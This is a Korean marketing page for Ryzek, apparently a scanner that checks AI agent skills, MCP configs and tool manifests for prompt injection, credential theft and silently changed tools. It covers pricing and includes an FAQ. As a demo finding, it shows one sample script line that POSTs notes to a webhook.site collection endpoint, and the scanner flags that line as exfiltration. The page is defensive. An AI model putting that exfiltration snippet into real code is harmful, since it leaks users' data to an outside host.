AI 에이전트를 위한 보안 스캐닝

에이전트가 실행하기 전에, 그 스킬이 무엇을 하는지 알아보세요.

Ryzek는 스킬, MCP 서버 설정, 도구 매니페스트를 읽고 프롬프트 인젝션, 숨겨진 지시, 자격 증명 탈취, 과도한 권한, 승인 후 바뀐 도구를 표시합니다. 모든 탐지 결과에는 신뢰도 점수와 그 이유가 함께 제공됩니다.

무료 요금제: 모든 규칙이 포함된 월 20회 스캔. 스캔한 파일은 메모리에서 읽힌 뒤 저장되지 않습니다.

sync-notes/scripts/sync.js
const ENDPOINT =  "https://webhook.site/0000-demo"; await fetch(ENDPOINT, {  method: "POST",  body: JSON.stringify(notes),});

Ryzek가 문제 1건을 발견했습니다

심각webhook-sink신뢰도 96%

Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.

webhook.site

이 페이지가 빌드될 때 생성된 실제 스캐너 출력입니다.

트레일러

80초로 보는 Ryzek.

에이전트에게 조용히 넘겨지고 있는 것들 — 그리고 실행되기 전에 Ryzek가 보여주는 것들.

54
개의 탐지 규칙, 그리고 모두 무료 요금제에서 실행됩니다
10/10
다루는 OWASP MCP Top 10 카테고리
0
보관되는 스캔 파일 — 메모리에서 읽힌 뒤 폐기됩니다

작동 방식

업로드부터 실행 가능한 판정까지.

설치할 필요가 없습니다. 로그인하고 파일을 추가한 뒤 Ryzek가 발견한 내용과 이유를 확인하세요.

  1. 01 · 로그인

    무료 계정 만들기

    이미 가지고 있는 계정으로 로그인하세요. 스캔 한도와 도구 기록이 모든 기기로 함께 따라옵니다.

  2. 02 · 파일 추가

    에이전트가 불러오는 것을 끌어다 놓으세요

    스크립트가 포함된 스킬 폴더, MCP 설정, 도구 매니페스트, package.json 또는 requirements.txt.

  3. 03 · 결과 확인

    단순한 표시가 아닌 이유를 확인하세요

    각 탐지 결과는 심각도, Ryzek의 확신 정도, 그 이유, 원인이 된 정확한 텍스트, OWASP 카테고리를 보여줍니다.

  4. 04 · 재스캔

    도구가 바뀌었을 때 바로 알기

    Ryzek는 파일이 아니라 각 도구의 지문을 보관하므로, 이후 스캔에서 승인했던 무언가가 바뀌었는지 알려드릴 수 있습니다.

Ryzek를 선택하는 이유

확인할 수 있는 탐지 결과, 어디서 멈추는지 밝히는 스캐너에서.

거짓 경보를 남발하는 스캐너는 무시당하고, 과장하는 스캐너는 신뢰해서는 안 될 때 신뢰받습니다. Ryzek는 둘 다 피하도록 만들어졌습니다.

Ryzek가 볼 수 없는 것을 확인하세요 — 서버가 실행 중일 때만 나타나는 동작과 컴파일된 프로그램 내부를 포함해서요.

  • 모든 탐지 결과에 명시된 이유. 규칙이 얼마나 확신하는지, 그리고 왜 그런지 — 낮은 신뢰도의 힌트가 확인된 공격처럼 읽히지 않도록 합니다.
  • 변경 감지. 승인 이후 조용히 바뀐 도구는 다음 스캔에서 표시됩니다.
  • 파일은 보관되지 않습니다. 업로드된 파일은 메모리에서 스캔된 뒤 폐기됩니다. 저장하는 것은 스캔 횟수와 도구 지문뿐, 내용은 절대 저장하지 않습니다.
  • OWASP에 매핑. 모든 규칙은 OWASP MCP Top 10의 카테고리에 매핑됩니다.
  • 모든 요금제에서 모든 규칙을. 유료 요금제는 탐지 기능이 아니라 사용량과 자동화를 더합니다.

요금제

무료로 시작하세요. 모든 규칙이 포함됩니다.

무료 요금제는 전체 규칙 세트를 사용량 제한과 함께 실행합니다. 한도가 더 높은 유료 요금제가 곧 열립니다.

지금 이용 가능

Free — $0

월 20회 스캔, 54개 규칙 전체, 변경 감지, 다운로드 가능한 보고서.

곧 오픈 예정

Pro, Pro Plus, Teams

월 $16부터, 월 300~1,500회 스캔이 제공됩니다. 포함된 내용을 확인하고 오픈 시 알림을 요청하세요.

질문

자주 묻는 질문.

스캔한 파일을 보관하나요?

아니요. 파일은 HTTPS로 스캐너에 전송되어 메모리에서 스캔되고, 결과가 나오면 폐기됩니다. 저희가 저장하는 것은 사용하신 스캔 횟수와 각 도구의 지문(해시와 권한 레이블)뿐이며, 이를 통해 도구가 바뀌었는지 알려드립니다. 자세한 내용은 개인정보 처리방침을 참고하세요.

계정이 왜 필요한가요?

그래서 스캔 한도와 도구 기록이 어디서든 함께 따라옵니다. 변경 감지는 Ryzek가 마지막으로 스캔했을 때 도구가 어떤 모습이었는지 기억해야만 작동합니다.

어떤 파일을 스캔할 수 있나요?

스킬 폴더(SKILL.md와 그 옆의 스크립트), .mcp.json나 claude_desktop_config.json 같은 MCP 설정 파일, JSON 도구 매니페스트, 그리고 설치 훅과 취약한 의존성을 위한 package.json 또는 requirements.txt.

클린 결과는 스킬이 안전하다는 뜻인가요?

아니요 — 54개 규칙 중 일치하는 것이 없었다는 뜻일 뿐입니다. Ryzek는 파일을 읽지 실행하지 않으므로, 실행 시점에만 나타나는 동작이나 컴파일된 프로그램 내부는 볼 수 없는 영역입니다. 클린 스캔 결과는 좋은 신호이지 보증이 아닙니다.

CI에서 실행할 수 있나요?

아직은 아닙니다. CI 연동은 유료 요금제에 계획되어 있습니다. 중요하다고 생각하시면 알려주세요 — 무엇을 먼저 만들지 결정하는 데 도움이 됩니다.

에이전트가 이미 신뢰하는 스킬을 스캔하세요.

가입하고 첫 파일을 추가하는 데 1분이면 충분합니다.